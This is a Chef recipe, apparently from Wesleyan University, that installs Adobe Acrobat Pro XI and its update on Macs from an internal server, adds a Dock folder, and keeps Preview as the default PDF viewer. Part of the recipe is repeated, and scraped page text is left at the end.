dmg_package "Adobe Acrobat Update" do
app "AcrobatUpd11006"
volumes_dir "AcrobatUpd11006"
dmg_name "AcrobatUpd11006"
source "http://ims-chef.wesleyan.edu/os_x/adobe_acrobat_pro_xi/AcrobatUpd11006.dmg"
checksum "5e2703042d29ba9df03007cbd582e1bff5a58b43abe1c637dcb891d581b25d5d"
action :install
type "pkg"
package_id "com.adobe.acrobat.a11.AcrobatUpd11006"
end
# Download icon
cookbook_file "/tmp/adobe.png"
dock_add "Adobe Creative Suite 6" do
all_users true
action :folder_create
show_as "list"
display_as "folder"
arrangement "name"
icon "/tmp/adobe.png"
end
# Add to dock
dock_add "/Applications/Adobe Acrobat XI Pro/Adobe Acrobat Pro.app" do
all_users true
group "Adobe Creative Suite 6"
restart true
end
# Keep Preview as the default viewer for PDFs
launch_association_set_file_handler "com.adobe.pdf" do
bundle_id "com.apple.Preview"
all_users true
end
Updated SHA-1 for Acrobat Pro
Rebuilt pkg with Adobe Customization Wizard to fix issues.
#
# Cookbook Name:: adobe_acrobat_pro_xi
# Recipe:: mac
#
# Copyright 2014, Wesleyan University
#
# All rights reserved - Do Not Redistribute
#
# Install base package
dmg_package "Adobe Acrobat Pro" do
app "adobe_acrobat_pro_xi-11.0"
volumes_dir "adobe_acrobat_pro_xi-11.0"
dmg_name "adobe_acrobat_pro_xi-11.0"
source "http://ims-chef.wesleyan.edu/os_x/adobe_acrobat_pro_xi/adobe_acrobat_pro_xi-11.0.dmg"
checksum "9dc74ec4dc7fe8724d9f8db12413c54f54a9a17840b52e7af15212c8aaf3ffb3"
action :install
type "pkg"
package_id "com.adobe.acrobat.11.viewer.app.pkg.MUI"
end
# Install latest point release update
dmg_package "Adobe Acrobat Update" do
app "AcrobatUpd11006"
volumes_dir "AcrobatUpd11006"
dmg_name "AcrobatUpd11006"
source "http://ims-chef.wesleyan.edu/os_x/adobe_acrobat_pro_xi/AcrobatUpd11006.dmg"
checksum "5e2703042d29ba9df03007cbd582e1bff5a58b43abe1c637dcb891d581b25d5d"
action :install
type "pkg"
package_id "com.adobe.acrobat.a11.AcrobatUpd11006"
end
# Download icon
cookbook_file "/tmp/adobe.png"
dock_add "Adobe Creative Suite 6" do
all_users true
action :folder_create
show_as "list"
display_as "folder"
arrangement "name"
icon "/tmp/adobe.png"
end
# Add to dock
dock_add "/Applications/Adobe Acrobat XI Pro/Adobe Acrobat Pro.app" do
all_users true
group "Adobe Creative Suite 6"
restart true
end
# Keep Preview as the default viewer for PDFs
launch_association_set_file_handler "com.adobe.pdf" do
bundle_id "com.apple.Preview"
all_users true
end
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.